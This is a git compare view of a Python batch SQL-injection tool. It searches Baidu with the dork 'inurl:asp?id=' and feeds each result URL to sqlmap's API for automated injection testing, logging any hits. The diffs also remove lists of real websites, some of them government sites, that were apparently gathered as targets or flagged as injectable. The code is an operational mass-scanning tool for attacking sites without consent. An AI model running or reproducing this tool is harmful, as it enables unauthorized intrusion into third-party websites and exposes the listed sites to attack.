Compare commits
10 commits: 813f305db8 ... 57d47e8a00

- 57d47e8a00
- ef2da26e23
- e4b03bf86d
- 4d9755bf5e
- 84a098efbb
- 8f8ebddb95
- a2267acb0c
- ee4cd19f36
- 69b595c060
- 0d74222aaa
.gitignore (new file, vendored, 4 lines)

```diff
@@ -0,0 +1,4 @@
+*.pyc
+.DS_Store
+*.log
+data/*.*
```
AutoSqli.py (66 lines changed)

```diff
@@ -1,20 +1,22 @@
 #!/usr/bin/python
 #-*-coding:utf-8-*-
+from __future__ import absolute_import, print_function
+
 import requests
 import time
 import json
 import threading
 import Queue
-from search.baidu import *
+from search import baidu
+import logging
+from config import LOG, API_URL


 class AutoSqli(object):

     """
     Uses sqlmapapi's API to interact with the server that sqlmapapi starts.

     """

     def __init__(self, server='', target='',data = '',referer = '',cookie = ''):
         super(AutoSqli, self).__init__()
         self.server = server
@@ -28,17 +30,22 @@ class AutoSqli(object):
         self.referer = referer
         self.cookie = cookie
         self.start_time = time.time()
+        self.logger = logging.getLogger('app.run')
+        self.logger.info('Creating an instance of AutoSqli for {0}.'.format(self.target))

     def task_new(self):
         try:
             self.taskid = json.loads(
                 requests.get(self.server + 'task/new').text)['taskid']
             #print 'Created new task: ' + self.taskid
             if len(self.taskid) > 0:
                 return True
             return False
         except ConnectionError:
             self.logging.error("sqlmapapi.py is not running")

     def task_delete(self):
-        json_kill=requests.get(self.server + 'task/' + self.taskid + '/delete').text
+        json_kill = requests.get(self.server + 'task/' + self.taskid + '/delete').text
         # if json.loads(requests.get(self.server + 'task/' + self.taskid + '/delete').text)['success']:
         #     #print '[%s] Deleted task' % (self.taskid)
         #     return True
@@ -46,7 +53,7 @@ class AutoSqli(object):

     def scan_start(self):
         headers = {'Content-Type': 'application/json'}
-        print "starting to scan "+ self.target +".................."
+        self.logger.debug("Starting to scan "+ self.target +"..................")
         payload = {'url': self.target}
         url = self.server + 'scan/' + self.taskid + '/start'
         t = json.loads(
@@ -74,9 +81,10 @@ class AutoSqli(object):
             #print 'not injection\t'
             pass
         else:
-            f=open('data/injection.txt','a')
+            f = open('data/injection.txt','a')
             f.write(self.target+'\n')
-            print 'injection \t'
             f.close()
+            self.logger.warning('injection \t')

     def option_set(self):
         headers = {'Content-Type': 'application/json'}
@@ -134,28 +142,46 @@ class myThread(threading.Thread):
         objects=self.q.get()
         result=objects.run()



-if __name__ == '__main__':
-    urls=[]
-    print 'the program starts!'
-    key='inurl:asp?id='
-    pages=3
-    urls=geturl(key,pages)
+def main():
+    import argparse
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-n', '--num', default=4, nargs='?', type=int, dest='num', help="Thread num")
+    parser.add_argument('-p', '--page', default=3, nargs='?', type=int, dest='page', help="Search Page num")
+    parser.add_argument('-d', '--log', default=LOG["filename"], nargs='?', type=str, dest='log', help="The path of debug log")
+    args = parser.parse_args()
+    logger = logging.getLogger('app')
+    logger.setLevel(LOG["level"])
+    fh = logging.FileHandler(args.log)
+    fh.setLevel(LOG["level"])
+    formatter = logging.Formatter(LOG['format'], LOG["datefmt"])
+    fh.setFormatter(formatter)
+    sh = logging.StreamHandler()
+    sh.setLevel(LOG["level"])
+    sh.setFormatter(formatter)
+    logger.addHandler(fh)
+    logger.addHandler(sh)
+    urls = []
+    logger.info('the program starts!')
+    pages = args.page
+    key = 'inurl:asp?id='
+    urls = baidu.geturl(key, pages)
     #print urls
-    workQueue=Queue.Queue()
+    workQueue = Queue.Queue()
     for tar in urls:
-        s = AutoSqli('http://127.0.0.1:8775', tar)
+        s = AutoSqli(API_URL, tar)
         workQueue.put(s)
     threads = []
-    nloops = range(4) #threads Num
+    nloops = range(args.num) #threads Num
     for i in nloops:
-        t = myThread(workQueue,i)
+        t = myThread(workQueue, i)
         t.start()
         threads.append(t)
     for i in nloops:
         threads[i].join()
-    print "Exiting Main Thread"
+    logger.info("Exiting Main Thread")

+if __name__ == '__main__':
+    main()
```
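The refactor keeps AutoSqli's job the same: drive one sqlmap scan per target through the sqlmapapi REST server. Below is a minimal sketch of that lifecycle. The `task/new` and `task/<id>/delete` calls appear in this diff; `scan/<id>/start`, `scan/<id>/status`, and `scan/<id>/data` are assumed from sqlmapapi's API, since the polling code sits in parts of the file this diff does not show.

```python
from __future__ import print_function

import json
import time

import requests

API_URL = 'http://127.0.0.1:8775'


def scan_once(target):
    # 1. create a task on the sqlmapapi server
    taskid = json.loads(requests.get(API_URL + '/task/new').text)['taskid']
    try:
        # 2. start a scan of the target url
        headers = {'Content-Type': 'application/json'}
        requests.post(API_URL + '/scan/' + taskid + '/start',
                      data=json.dumps({'url': target}), headers=headers)
        # 3. poll until the engine reports the scan terminated
        while True:
            status = json.loads(
                requests.get(API_URL + '/scan/' + taskid + '/status').text)
            if status['status'] == 'terminated':
                break
            time.sleep(5)
        # 4. a non-empty 'data' list means an injection was found
        data = json.loads(
            requests.get(API_URL + '/scan/' + taskid + '/data').text)
        return len(data['data']) > 0
    finally:
        # 5. delete the task either way
        requests.get(API_URL + '/task/' + taskid + '/delete')


if __name__ == '__main__':
    print(scan_once('http://www.example.com/index.php?id=1'))
```

As the README below notes, `python sqlmapapi.py -s` must be listening before any of these calls succeed.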
README.md (new file, 17 lines)

```diff
@@ -0,0 +1,17 @@
+## sqlmapapi_pi batch injection tool
+------------
+**Introduction:**
+
+- This program is a secondary development of [manning23](https://github.com/manning23)'s project; for reference see [click me](http://drops.wooyun.org/tips/6653)
+- It uses Baidu to crawl for specific url links, then calls sqlmapapi (sqlmap's built-in batch interface) to test them for injection.
+- For the option settings in AutoSqli.py, see set_option.txt; the injection check is customizable, e.g. time-based or boolean-based.
+
+**Usage:**
+- In the sqlmap directory, run `python sqlmapapi.py -s` to start the listener.
+- Run AutoSqli.py with `python AutoSqli.py`; list the arguments with `-h`.
+
+**Tips:**
+* Note that the search keyword is customized in the code: `key='inurl:asp?id='`
+* As is the thread count: `nloops = range(4) #threads Num`
+* Keep the thread count modest so the program does not hang.
+* Do not use this tool for anything illegal.
```
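With the flags this range adds to AutoSqli.py, a typical run (the values here are hypothetical) would be `python AutoSqli.py -n 8 -p 5 -d autosqli.log`: eight worker threads, five Baidu result pages, and a custom debug-log path, with `python sqlmapapi.py -s` already listening.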
config.py (new file, 18 lines)

```diff
@@ -0,0 +1,18 @@
+#!/bin/env python
+# -*- coding=utf-8 -*-
+import logging
+
+API_URL = "http://127.0.0.1:8775"
+
+LEVELS = {'debug': logging.DEBUG,
+          'info': logging.INFO,
+          'warning': logging.WARNING,
+          'error': logging.ERROR,
+          'critical': logging.CRITICAL}
+
+LOG = {
+    "level" : LEVELS["debug"],
+    "filename" : "autosqli.log",
+    "format" : '[%(asctime)s] %(levelname)-8s %(name)-12s %(message)s',
+    "datefmt" : '%Y-%m-%d %H:%M:%S'
+}
```
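config.py centralizes the settings for the `'app'` logger hierarchy used across this range: `main()` in AutoSqli.py attaches handlers to the parent `'app'` logger, and the modules only ask for child loggers (`'app.run'` in AutoSqli, `'app.baidu'` in search/baidu.py), whose records propagate up to those handlers. A small sketch of that wiring, assuming the new config module is importable; a single `StreamHandler` stands in for the file-plus-stream pair `main()` sets up:

```python
import logging

from config import LOG  # the config module added in this range

# configure the parent logger once, as main() does
logger = logging.getLogger('app')
logger.setLevel(LOG['level'])
sh = logging.StreamHandler()
sh.setFormatter(logging.Formatter(LOG['format'], LOG['datefmt']))
logger.addHandler(sh)

# modules request child loggers and inherit the handlers via propagation
child = logging.getLogger('app.baidu')
child.info('this record is emitted through the app handlers')
```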
data/injection.txt (7 lines changed, Executable file → Normal file)

```diff
@@ -1,6 +1 @@
-http://www.lamarche.com.tw/production_detail.php?shop_category=64&sn=248
-http://www.70jj.com/shop/index.php?shop_id=1
-http://www.cosmax.com.hk/products_detail.php?product_id=17
-http://www.etron.com/en/products/u3hc_detial.php?Product_ID=5
-http://www.fembooks.com.tw/indexstore.php?product_id=5423
-http://www.guangzhouflower.net.cn/product.php?pid=12
+http://www.example.com
```

```diff
@@ -1,20 +0,0 @@
-http://www.99166.com/zjinfo.asp?id=5
-http://www.yh8z.com/Secondary/guding.asp?Id=68&Parent_ID=18&Type_Class=news&GS_Class=22
-http://www.gdkszx.com.cn/ksxx/kszc_show.asp?id=2205
-http://www.smxs.gov.cn/viewtexti.asp?id=275079&npage=6
-http://www.juancheng.gov.cn/wsbs-view.asp?id=9285
-http://rc.sz.zj.cn/company.asp?id=4291
-http://www.law-lib.com/fxj/fxj.asp?id=940
-http://www.kfws.gov.cn/Article_read.asp?id=2289
-http://www.zjghtcm.com/new_show.asp?id=1178
-http://www.medsci.cn/sci/journal.asp?id=0bc61099
-http://www.dylaw.gov.cn/zhongc/web60/classshow.asp?id=51848&classid=15
-http://club.kdnet.net/dispbbs.asp?id=11095423&boardid=1
-http://people.rednet.cn/PeopleShow.asp?ID=2410432
-http://www.dhzsxx.com/ShowNews.asp?id=1591
-http://www.chinawutong.com/co/huoyuan_01/index.asp?id=213633
-http://news.chinaxinge.com/shownews.asp?id=53866&sjm=49600b363e048e05
-http://www.gxxgty.com/news_show.asp?id=1583
-http://szb.keq0475.com/Qnews.asp?ID=49506
-http://www.cyfy.cn/kssz.asp?id=42
-http://www.szkweekly.com/List.asp?ID=54284
```

Binary file not shown.
search/baidu.py

```diff
@@ -1,11 +1,16 @@
 #coding: utf-8
+from __future__ import unicode_literals
+
 import urllib2
 import string
 import urllib
 import re
 import random
+import logging

-user_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0', \
+__all__ = ["geturl"]
+
+USER_AGENTS = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0', \
                'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0', \
                'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533+ \
                (KHTML, like Gecko) Element Browser 5.0', \
@@ -18,26 +23,31 @@ user_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Fire
                Chrome/28.0.1468.0 Safari/537.36', \
                'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; TheWorld)']

-def baidu_search(keyword,pn):
-    p= {'wd': keyword}
-    res=urllib2.urlopen(("http://www.baidu.com/s?"+urllib.urlencode(p)+"&pn={0}&cl=3&rn=10").format(pn)) # rn is the number of results per page; pn is the offset of the first result shown
-    html=res.read()
+logger = logging.getLogger('app.baidu')
+
+def baidu_search(keyword, pn):
+    p = {'wd': keyword}
+    res = urllib2.urlopen(("http://www.baidu.com/s?"+urllib.urlencode(p)+"&pn={0}&cl=3&rn=10").format(pn)) # rn is the number of results per page; pn is the offset of the first result shown
+    html = res.read()
     return html
-def getList(regex,text): # dedupe the fetched urls and store them in a list
+
+def getList(regex, text): # dedupe the fetched urls and store them in a list
     arr = []
     res = re.findall(regex, text)
     if res:
         for r in res:
             arr.append(r)
     return arr
-def getMatch(regex,text): # matching helper
+
+def getMatch(regex, text): # matching helper
     res = re.findall(regex, text)
     if res:
         return res[0]
     return ''

 def is_get(url): # is this a GET-style link that sqlmap can recognize
-    regex=r'(\S*?)\?.*=.*'
-    res=re.match(regex,url)
+    regex = r'(\S*?)\?.*=.*'
+    res = re.match(regex,url)
     if res:
         #print res.group(1)
         return res.group(1)
@@ -46,12 +56,12 @@ def is_get(url): # is this a GET-style link that sqlmap can recognize
 # def Deduplication():
 #     regex=r'\S'

-def geturl(keyword,pages): # fetch urls
+def geturl(keyword, pages): # fetch urls
     targets = []
-    hosts=[]
+    hosts = []
     for page in range(0,int(pages)):
-        pn=(page+1)*10
-        html = baidu_search(keyword,pn)
+        pn = (page+1)*10
+        html = baidu_search(keyword, pn)
         content = unicode(html, 'utf-8','ignore')
         arrList = getList(u"<div class=\"f13\">(.*)</div>", content) # split the page into result blocks
         #print arrList
@@ -61,28 +71,29 @@ def geturl(keyword, pages): # fetch urls
         for item in arrList:
             regex = u"data-tools='\{\"title\":\"(.*)\",\"url\":\"(.*)\"\}'"
             link = getMatch(regex,item)
-            url=link[1] # get the Baidu-rewritten url
+            url = link[1] # get the Baidu-rewritten url
             try:
-                domain=urllib2.Request(url)
-                r=random.randint(0,11)
-                domain.add_header('User-agent', user_agents[r])
-                domain.add_header('connection','keep-alive')
-                response=urllib2.urlopen(domain)
-                uri=response.geturl() # get the real url
-                urs=is_get(uri) # is it a traditional GET type
+                domain = urllib2.Request(url)
+                r = random.randint(0, len(USER_AGENTS))
+                domain.add_header('User-agent', USER_AGENTS[r])
+                domain.add_header('connection', 'keep-alive')
+                response = urllib2.urlopen(domain)
+                uri = response.geturl() # get the real url
+                urs = is_get(uri) # is it a traditional GET type
                 if (uri in targets) or (urs in hosts) :
                     continue
                 else:
                     targets.append(uri)
                     hosts.append(urs)
-                    f1=open('data/targets.txt','a') # store the url links
+                    f1 = open('data/targets.txt','a') # store the url links
                     f1.write(uri+'\n')
                     f1.close()
             except:
                 continue
-    print "urls have been grabed already!!!"
+    logger.info("urls have been grabed already!!!")
     return targets


 if __name__ == '__main__':
     pass
```
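One detail worth flagging in the new user-agent selection: `random.randint` is inclusive at both ends, so `random.randint(0, len(USER_AGENTS))` can return `len(USER_AGENTS)` and make `USER_AGENTS[r]` raise `IndexError`, which the bare `except` then swallows, silently dropping that URL. A bounds-safe sketch, with the list abbreviated:

```python
import random

USER_AGENTS = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0']  # abbreviated

# random.choice never indexes past the end of the list, unlike
# USER_AGENTS[random.randint(0, len(USER_AGENTS))]
user_agent = random.choice(USER_AGENTS)
```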
search/baidu.pyc (BIN, binary file not shown)